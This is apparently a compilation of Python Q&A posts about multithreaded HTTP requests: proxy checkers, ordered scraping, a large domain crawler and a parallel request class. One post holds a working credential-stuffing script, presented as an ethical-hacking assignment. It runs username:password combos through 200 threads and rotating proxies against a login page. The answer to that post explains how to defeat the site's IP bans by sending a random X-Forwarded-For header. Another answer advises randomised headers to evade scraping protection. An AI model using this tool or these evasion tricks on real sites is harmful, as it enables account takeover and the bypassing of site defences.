I'm building a proxy checker using multiple threads, specifically a thread pool created with:
from multiprocessing.dummy import Pool as ThreadPool
The HTTP requests are made with urllib2.
What I want to do is run 20 requests for each proxy. With a single thread this would take too long; that's where the power of multithreading comes in. Once I set up the proxy I want to run those 20 requests and manage two things: first, count the exceptions and dump the proxy if too many occur; second, save the average response time and present it later.
I just can't manage to implement this. I have, however, implemented it with a single thread:
import socket
import ssl
import time
import urllib
import urllib2
import httplib

proxyList = []

def loadProxysFromFile(fileName):
    global proxyList
    with open(fileName) as f:
        proxyList = [line.rstrip('\n') for line in f]

def setUrllib2Proxy(proxyAddress):
    proxy = urllib2.ProxyHandler({
        'http': "http://" + proxyAddress,
        'https': "https://" + proxyAddress
    })
    opener = urllib2.build_opener(proxy)
    urllib2.install_opener(opener)

def timingRequest(proxy, url):
    error = False
    setUrllib2Proxy(proxy)
    start = time.time()
    try:
        req = urllib2.Request(url)
        urllib2.urlopen(req, timeout=5)  # opening the request (getting a response)
    except (urllib2.URLError, httplib.BadStatusLine, ssl.SSLError, socket.error) as e:
        error = True
    end = time.time()
    timing = end - start
    if error:
        print "Error with proxy " + proxy
        return 0
    else:
        print proxy + " Request to " + url + " took: %s" % timing + " seconds."
        return timing
# Main
loadProxysFromFile("proxyList.txt")

for proxy in proxyList:
    print "Testing: " + proxy
    print "\n"

REQUEST_NUM = 20
ERROR_TOLERANCE_NUM = 3
resultList = []

for proxy in proxyList:
    avgTime = 0
    errorCount = 0
    for x in range(0, REQUEST_NUM):
        result = timingRequest(proxy, 'https://www.google.com')
        if (result == 0):
            errorCount += 1
            if (errorCount >= ERROR_TOLERANCE_NUM):
                break
        else:
            avgTime += result
    if (errorCount < ERROR_TOLERANCE_NUM):
        avgTime = avgTime / (REQUEST_NUM - errorCount)
        resultList.append(proxy + " has an average response time of: %s" % avgTime)

print '\n'
print "Results Summary: "
print "-----------------"
for res in resultList:
    print res
Things that must be done are:
For every proxy, wait until all 20 requests are over before changing the proxy, and somehow synchronize the threads when they add up their timings to compute the average response time (the requests that raised exceptions must not be counted).
The best solution I've read so far is using from multiprocessing.dummy import Pool as ThreadPool and pool.map(func, iterable), but I can't figure out how to implement it in my code.
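A minimal sketch of how this could look with pool.map, assuming the functions, constants and proxyList defined above. pool.map blocks until the whole batch has finished, which gives the "wait for all 20 requests before changing proxy" behaviour for free; the early break after the third error is dropped for simplicity, and since urllib2.install_opener sets a global opener this only works because all threads in a batch share the same proxy:

from multiprocessing.dummy import Pool as ThreadPool

def testProxy(proxy):
    # Fire REQUEST_NUM requests for this one proxy in parallel.
    pool = ThreadPool(REQUEST_NUM)
    timings = pool.map(lambda _: timingRequest(proxy, 'https://www.google.com'), range(REQUEST_NUM))
    pool.close()
    pool.join()
    errorCount = timings.count(0)          # timingRequest returns 0 on error
    if errorCount >= ERROR_TOLERANCE_NUM:
        return None                        # too many errors: dump the proxy
    good = [t for t in timings if t != 0]
    return sum(good) / len(good)           # average over the successful requests only

for proxy in proxyList:
    avg = testProxy(proxy)                 # proxies are still handled one at a time
    if avg is not None:
        resultList.append(proxy + " has an average response time of: %s" % avg)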
Related
I test my proxies with this script and it reports many of them as working, but when I test the "working" proxies with another proxy checker, only a very small number of them actually work.
Here is the part that checks whether a proxy works:
def process(self, task):
    global alive
    global dead
    global tested
    proxy = task
    log_msg = str("Trying HTTP proxy%21s " % proxy)
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(cj),
        urllib.request.HTTPRedirectHandler(),
        urllib.request.ProxyHandler({'http': proxy})
    )
    try:
        t1 = time.time()
        response = opener.open(test_url, timeout=timeout_value).read()
        tested += 1
        t2 = time.time()
    except Exception as e:
        log_msg += "%s " % fail_msg
        print(Fore.LIGHTRED_EX + log_msg)
        dead += 1
        tested += 1
        return None
    log_msg += ok_msg + "Response time: %d" % (int((t2 - t1) * 1000))
    print(Fore.LIGHTGREEN_EX + log_msg)
    text_file = open(out_filename, "a")
    text_file.write(proxy + "\r\n")
    text_file.close()
    alive += 1
I have a list of many links and I want to use multiprocessing to speed the process up. Here is a simplified version; I need the output to come out in the same order as the input links.
I tried a lot of things (Process, Pool, etc.) but I always got errors. I need to do it with 4 or 8 threads and keep the output ordered. Thanks for any help. Here is the code:
from bs4 import BeautifulSoup
import requests
import time

links = ["http://www.tennisexplorer.com/match-detail/?id=1672704", "http://www.tennisexplorer.com/match-detail/?id=1699387", "http://www.tennisexplorer.com/match-detail/?id=1698990", "http://www.tennisexplorer.com/match-detail/?id=1696623", "http://www.tennisexplorer.com/match-detail/?id=1688719", "http://www.tennisexplorer.com/match-detail/?id=1686305"]
data = []

def essa(match, omega):
    aaa = BeautifulSoup(requests.get(match).text, "lxml")
    center = aaa.find("div", id="center")
    p1_l = center.find_all("th", class_="plName")[0].find("a").get("href")
    p2_l = center.find_all("th", class_="plName")[1].find("a").get("href")
    return p1_l + " - " + p2_l + " - " + str(omega)

i = 1
start_time = time.clock()
for link in links:
    data.append(essa(link, i))
    i += 1
for d in data:
    print(d)
print(time.clock() - start_time, "seconds")
Spawn a thread for each call of the function and join them all afterwards:
from threading import Thread

def essa(match, omega):
    aaa = BeautifulSoup(requests.get(match).text, "lxml")
    center = aaa.find("div", id="center")
    p1_l = center.find_all("th", class_="plName")[0].find("a").get("href")
    p2_l = center.find_all("th", class_="plName")[1].find("a").get("href")
    print(p1_l + " - " + p2_l + " - " + str(omega))

if __name__ == '__main__':
    threadlist = []
    for index, url in enumerate(links):
        t = Thread(target=essa, args=(url, index))
        t.start()
        threadlist.append(t)
    for b in threadlist:
        b.join()
You won't get them to print in order, for the simple reason that some HTTP responses take longer than others. If you need the results in the original order, collect them and print afterwards, as sketched below.
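One option is to have each call return its string (as the essa in the question already does) and collect the results with a thread-pool map, which preserves the order of the input. A minimal sketch, assuming the links list and the return-style essa from the question:

from multiprocessing.dummy import Pool as ThreadPool

def fetch(args):
    link, index = args
    return essa(link, index)  # the essa from the question that returns a string

pool = ThreadPool(4)  # or 8
results = pool.map(fetch, [(link, i + 1) for i, link in enumerate(links)])
pool.close()
pool.join()

for line in results:
    print(line)  # printed in the same order as links, regardless of which finished first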
As far as I can understand, you have a list of links and want to make the requests concurrently to speed the process up. Here is sample code for multithreading; I hope it helps. Read the documentation on concurrent.futures for details.
import concurrent.futures
import urllib.request

URLS = ['http://www.foxnews.com/',
        'http://www.cnn.com/',
        'http://europe.wsj.com/',
        'http://www.bbc.co.uk/',
        'http://some-made-up-domain.com/']

# Retrieve a single page and report the URL and contents
def load_url(url, timeout):
    with urllib.request.urlopen(url, timeout=timeout) as conn:
        return conn.read()

# We can use a with statement to ensure threads are cleaned up promptly
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
    # Start the load operations and mark each future with its URL
    future_to_url = {executor.submit(load_url, url, 60): url for url in URLS}
    for future in concurrent.futures.as_completed(future_to_url):
        url = future_to_url[future]
        try:
            data = future.result()
        except Exception as exc:
            print('%r generated an exception: %s' % (url, exc))
        else:
            print('%r page is %d bytes' % (url, len(data)))
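Since the question also asks for ordered output: unlike as_completed, executor.map yields results in the same order as the input iterable, so a variant of the above could look like the sketch below (note that an exception from any URL is re-raised when its result is reached, which would stop the loop):

with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
    # executor.map returns results in the order of URLS, even though the
    # requests themselves run concurrently.
    for url, data in zip(URLS, executor.map(lambda u: load_url(u, 60), URLS)):
        print('%r page is %d bytes' % (url, len(data)))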
As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests to a website using proxies. To do that I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
from math import ceil  # used for the combos/min figure at the end

global proxy_queue
global user_queue
global hits
global stats
global start_time

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }

def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()

def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2

def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake']) / ((time.time() - start_time) / 60)),

if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000 / (ttr / 60)))
    except Exception as e:
        print e
So it is expected to make many requests to the website through multiple threads, but it doesn't work as expected. After a few requests the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
In the attempt to make multiple requests through multiple sessions, the code is somehow failing to keep them separate because it doesn't really run them asynchronously.
The victim site bans IPs by group, e.g. banning all IPs starting with 132.x.x.x after receiving multiple requests from any of the 132.x.x.x addresses.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or something similar to detect the originating IP. But that seems unlikely, because I can log in from my browser without any proxy and it doesn't throw any error, so my IP doesn't seem to be exposed in any way.
I am unsure whether I'm making an error in the threading part or in the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a lifesaver.
I was using elite-level proxies, so there should have been no way for the victim site to find my IP address; however, it was using X-Forwarded-For to detect my real IP address.
Since elite-level proxies do not expose the client IP address and don't attach the Client-IP header, the only way the victim site could detect my IP was through the last address in X-Forwarded-For. The solution to this problem is to set the X-Forwarded-For header to a random IP address every time a request is made, which successfully tricks the victim site into believing that the request is legitimate.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
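For completeness, one way to fold this into the get_default_header from the question (this needs import random, which is not in the original import list) might be:

import random

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/',
        # a fresh random address on every call, so successive requests cannot be
        # tied together through X-Forwarded-For
        'X-Forwarded-For': '.'.join([str(random.randint(0, 255)) for i in range(4)]),
    }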
I wrote this crawler in Python; it dumps several parameters to a JSON output file based on an input list of domains.
I have these questions:
Do I need to close the HTTP connection in each thread? The input data is about 5 million items. At the beginning it processes about 50 iterations per second, but after some time it drops to 1-2 per second and/or hangs (with no kernel messages and no errors on stdout). Is this caused by the code or is it network related? I suspect the software, because when I restart it, it starts again at the high rate (about 50 iterations per second).
Any tips on how to improve the code below are also welcome, especially regarding speed and crawling throughput.
Code in question:
import urllib2
import pprint
from tqdm import tqdm
import lxml.html
from Queue import Queue
from geoip import geolite2
import pycountry
from tld import get_tld
from threading import Thread  # needed below for the worker threads
import re                     # needed for the email regex
import sys                    # needed for sys.exit()

resfile = open("out.txt", 'a')

concurrent = 200

def doWork():
    while True:
        url = q.get()
        status = getStatus(url)
        doSomethingWithResult(status)
        q.task_done()

def getStatus(ourl):
    try:
        response = urllib2.urlopen("http://" + ourl)
        peer = response.fp._sock.fp._sock.getpeername()
        ip = peer[0]
        header = response.info()
        html = response.read()
        html_element = lxml.html.fromstring(html)
        generator = html_element.xpath("//meta[@name='generator']/@content")
        try:
            match = geolite2.lookup(ip)
            if match is not None:
                country = match.country
                try:
                    c = pycountry.countries.lookup(country)
                    country = c.name
                except:
                    country = ""
        except:
            country = ""
        try:
            res = get_tld("http://www" + ourl, as_object=True)
            tld = res.suffix
        except:
            tld = ""
        try:
            match = re.search(r'[\w\.-]+@[\w\.-]+', html)
            email = match.group(0)
        except:
            email = ""
        try:
            item = generator[0]
            val = "{ \"Domain\":\"http://"+ourl.rstrip()+"\",\"IP:\""+ip+"\"," + "\"Server\":"+ "\""+str(header.getheader("Server")).replace("None","")+"\",\"PoweredBy\":" + "\""+str(header.getheader("X-Powered-By")).replace("None","")+"\""+",\"MetaGenerator\":\""+item+"\",\"Email\":\""+email+"\",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
        except:
            val = "{ \"Domain\":\"http://"+ourl.rstrip()+"\",\"IP:\""+ip+"\"," + "\"Server\":"+ "\""+str(header.getheader("Server")).replace("None","")+"\",\"PoweredBy\":" + "\""+str(header.getheader("X-Powered-By")).replace("None","")+"\""+",\"MetaGenerator\":\"\",\"Email\":\""+email+"\",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
        return val
    except Exception as e:
        #print "error"+str(e)
        pass

def doSomethingWithResult(status):
    if status:
        resfile.write(str(status) + "\n")

q = Queue(concurrent * 2)
for i in range(concurrent):
    t = Thread(target=doWork)
    t.daemon = True
    t.start()

try:
    for url in tqdm(open('list.txt')):
        q.put(url.strip())
        status = open("status.txt", 'w')
        status.write(str(url.strip()))
    q.join()
except KeyboardInterrupt:
    sys.exit(1)
Update 1:
Closing the socket and file descriptor makes it work better; it no longer seems to hang after some time. Performance is about 50 requests/sec on a home laptop and about 100 requests/sec on a VPS.
from threading import Thread
import httplib, sys
import urllib2
import pprint
from tqdm import tqdm
import lxml.html
from Queue import Queue
from geoip import geolite2
import pycountry
from tld import get_tld
import json
import re  # needed for the email regex

resfile = open("out.txt", 'a')

concurrent = 200

def doWork():
    while True:
        url = q.get()
        status = getStatus(url)
        doSomethingWithResult(status)
        q.task_done()

def getStatus(ourl):
    try:
        response = urllib2.urlopen("http://" + ourl)
        realsock = response.fp._sock.fp._sock
        peer = response.fp._sock.fp._sock.getpeername()
        ip = peer[0]
        header = response.info()
        html = response.read()
        realsock.close()
        response.close()
        html_element = lxml.html.fromstring(html)
        generator = html_element.xpath("//meta[@name='generator']/@content")
        try:
            match = geolite2.lookup(ip)
            if match is not None:
                country = match.country
                try:
                    c = pycountry.countries.lookup(country)
                    country = c.name
                except:
                    country = ""
        except:
            country = ""
        try:
            res = get_tld("http://www" + ourl, as_object=True)
            tld = res.suffix
        except:
            tld = ""
        try:
            match = re.search(r'[\w\.-]+@[\w\.-]+', html)
            email = match.group(0)
        except:
            email = ""
        try:
            item = generator[0]
            val = "{ \"Domain\":"+json.dumps("http://"+ourl.rstrip())+",\"IP\":\""+ip+"\",\"Server\":"+json.dumps(str(header.getheader("Server")).replace("None",""))+",\"PoweredBy\":" +json.dumps(str(header.getheader("X-Powered-By")).replace("None",""))+",\"MetaGenerator\":"+json.dumps(item)+",\"Email\":"+json.dumps(email)+",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
        except:
            val = "{ \"Domain\":"+json.dumps("http://"+ourl.rstrip())+",\"IP\":\""+ip+"\"," + "\"Server\":"+json.dumps(str(header.getheader("Server")).replace("None",""))+",\"PoweredBy\":" +json.dumps(str(header.getheader("X-Powered-By")).replace("None",""))+",\"MetaGenerator\":\"\",\"Email\":"+json.dumps(email)+",\"Suffix\":\""+tld+"\",\"CountryHosted\":\""+country+"\" }"
        return val
    except Exception as e:
        print "error" + str(e)
        pass

def doSomethingWithResult(status):
    if status:
        resfile.write(str(status) + "\n")

q = Queue(concurrent * 2)
for i in range(concurrent):
    t = Thread(target=doWork)
    t.daemon = True
    t.start()

try:
    for url in tqdm(open('list.txt')):
        q.put(url.strip())
        status = open("status.txt", 'w')
        status.write(str(url.strip()))
    q.join()
except KeyboardInterrupt:
    sys.exit(1)
The handles will be garbage collected automatically, but you are better off closing them yourself, especially as you are doing this in a tight loop.
You also asked for suggestions for improvement. A big one would be to stop using urllib2 and start using requests instead.
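A rough sketch of what getStatus could look like with requests (this is only an outline: sharing one Session across the worker threads, the 10-second timeout and the json.dumps output format are my assumptions, and the lxml/geoip/tld/email parsing from the original would slot in where the comment is):

import json
import requests
from requests.adapters import HTTPAdapter

# One shared Session gives keep-alive and a connection pool sized to the worker count.
session = requests.Session()
session.mount("http://", HTTPAdapter(pool_connections=concurrent, pool_maxsize=concurrent))

def getStatus(ourl):
    try:
        response = session.get("http://" + ourl.strip(), timeout=10)
        header = response.headers
        html = response.text
        # ... same lxml / geoip / tld / email-regex handling as above ...
        return json.dumps({
            "Domain": "http://" + ourl.rstrip(),
            "Server": header.get("Server", ""),
            "PoweredBy": header.get("X-Powered-By", ""),
        })
    except requests.RequestException:
        return None

Letting json.dumps build the whole record also removes the manual quoting and escaping in the original string concatenation.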
There are many possible reasons why your crawling rate drops:
1.) Take care not to crawl too much data from the same domain. Some web servers are configured to allow only one parallel connection per IP address.
2.) Try to send randomized, browser-like HTTP headers (User-Agent, Referer, ...) to get past any scraping protection the web server may have; a sketch follows this list.
3.) Use a mature parallel HTTP library such as pycurl (which has MultiCurl) or requests (grequests). They will certainly perform faster.
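To illustrate point 2, a sketch of randomizing the headers per request (the user-agent strings here are only examples; pass the result to whichever HTTP call you end up using):

import random

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15",
]

def randomized_headers(referer="http://www.google.com/"):
    # Vary the User-Agent (and whatever else makes sense) so successive requests
    # do not all look identical to a scraping-protection layer.
    return {
        "User-Agent": random.choice(USER_AGENTS),
        "Referer": referer,
        "Accept-Language": "en-US,en;q=0.9",
    }

# e.g. response = session.get("http://" + ourl.strip(), headers=randomized_headers(), timeout=10)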
I'm trying to build a class that uses multiprocessing + requests to make several requests in parallel. I'm running into an issue where it just hangs and gives me a cryptic error message, and I'm not sure why.
Below is my code. It basically just uses a Pool with a callback to put results into a list. I have the requirement of a "hard timeout" for each URL, i.e. if a URL takes more than a few seconds to download its content, I just want to skip it. So I use a Pool timeout and diff the URLs attempted against the URLs whose content was returned; the ones that were attempted but not returned are assumed to have failed. Here is my code:
import time
import json
import requests
import sys
from urlparse import parse_qs
from urlparse import urlparse
from urlparse import urlunparse
from urllib import urlencode
from multiprocessing import Process, Pool, Queue, current_process
from multiprocessing.pool import ThreadPool
from multiprocessing import TimeoutError
import traceback
from sets import Set

from massweb.pnk_net.pnk_request import pnk_request_raw
from massweb.targets.fuzzy_target import FuzzyTarget
from massweb.payloads.payload import Payload

class MassRequest(object):
    def __init__(self, num_threads = 10, time_per_url = 10, request_timeout = 10, proxy_list = [{}]):
        self.num_threads = num_threads
        self.time_per_url = time_per_url
        self.request_timeout = request_timeout
        self.proxy_list = proxy_list
        self.results = []
        self.urls_finished = []
        self.urls_attempted = []
        self.targets_results = []
        self.targets_finished = []
        self.targets_attempted = []

    def add_to_finished(self, x):
        self.urls_finished.append(x[0])
        self.results.append(x)

    def add_to_finished_targets(self, x):
        self.targets_finished.append(x[0])
        self.targets_results.append(x)

    def get_urls(self, urls):
        timeout = float(self.time_per_url * len(urls))
        pool = Pool(processes = self.num_threads)
        proc_results = []
        for url in urls:
            self.urls_attempted.append(url)
            proc_result = pool.apply_async(func = pnk_request_raw, args = (url, self.request_timeout, self.proxy_list), callback = self.add_to_finished)
            proc_results.append(proc_result)
        for pr in proc_results:
            try:
                pr.get(timeout = timeout)
            except:
                pool.terminate()
                pool.join()
        pool.terminate()
        pool.join()
        list_diff = Set(self.urls_attempted).difference(Set(self.urls_finished))
        for url in list_diff:
            sys.stderr.write("URL %s got timeout" % url)
            self.results.append((url, "__PNK_GET_THREAD_TIMEOUT"))

if __name__ == "__main__":
    f = open("out_urls_to_fuzz_1mil")
    urls_to_request = []
    for line in f:
        url = line.strip()
        urls_to_request.append(url)
    mr = MassRequest()
    mr.get_urls(urls_to_request)
Here is the function being called by the threads:
def pnk_request_raw(url_or_target, req_timeout = 5, proxy_list = [{}]):
    if proxy_list[0]:
        proxy = get_random_proxy(proxy_list)
    else:
        proxy = {}
    try:
        if isinstance(url_or_target, str):
            sys.stderr.write("Requesting: %s with proxy %s\n" % (str(url_or_target), str(proxy)))
            r = requests.get(url_or_target, proxies = proxy, timeout = req_timeout)
            return (url_or_target, r.text)
        if isinstance(url_or_target, FuzzyTarget):
            sys.stderr.write("Requesting: %s with proxy %s\n" % (str(url_or_target), str(proxy)))
            r = requests.get(url_or_target.url, proxies = proxy, timeout = req_timeout)
            return (url_or_target, r.text)
    except:
        # use this to mark failure on exception
        traceback.print_exc()
        # edit: this is the line that was breaking it all
        sys.stderr.out("A request failed to URL %s\n" % url_or_target)
        return (url_or_target, "__PNK_REQ_FAILED")
This seems to work well for smaller sets of URLs, but here is the output:
Requesting: http://www.sportspix.co.za/ with proxy {}
Requesting: http://www.sportspool.co.za/ with proxy {}
Requesting: http://www.sportspredict.co.za/ with proxy {}
Requesting: http://www.sportspro.co.za/ with proxy {}
Requesting: http://www.sportsrun.co.za/ with proxy {}
Requesting: http://www.sportsstuff.co.za/ with proxy {}
Requesting: http://sportsstuff.co.za/2011-rugby-world-cup with proxy {}
Requesting: http://www.sportstar.co.za/4-stroke-racing with proxy {}
Requesting: http://www.sportstats.co.za/ with proxy {}
Requesting: http://www.sportsteam.co.za/ with proxy {}
Requesting: http://www.sportstec.co.za/ with proxy {}
Requesting: http://www.sportstours.co.za/ with proxy {}
Requesting: http://www.sportstrader.co.za/ with proxy {}
Requesting: http://www.sportstravel.co.za/ with proxy {}
Requesting: http://www.sportsturf.co.za/ with proxy {}
Requesting: http://reimo.sportsvans.co.za/ with proxy {}
Requesting: http://www.sportsvans.co.za/4x4andmoreWindhoek.html with proxy {}
Handled exception:Traceback (most recent call last):
File "mass_request.py", line 87, in get_fuzzy_targets
pr.get(timeout = timeout)
File "/usr/lib/python2.7/multiprocessing/pool.py", line 528, in get
raise self._value
AttributeError: 'file' object has no attribute 'out'
On that last exception, the program hangs and I have to kill it completely. As far as I know, I'm never trying to access a file object with the attribute "out". My question is: how do I fix this? Am I doing something obviously wrong here? Why isn't there a clearer exception?
I think that sys.stderr.out("A request failed to URL %s\n" % url_or_target) should be sys.stderr.write("A request failed to URL %s\n" % url_or_target)
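In other words, the tail of pnk_request_raw becomes:

    except:
        # use this to mark failure on exception
        traceback.print_exc()
        sys.stderr.write("A request failed to URL %s\n" % url_or_target)
        return (url_or_target, "__PNK_REQ_FAILED")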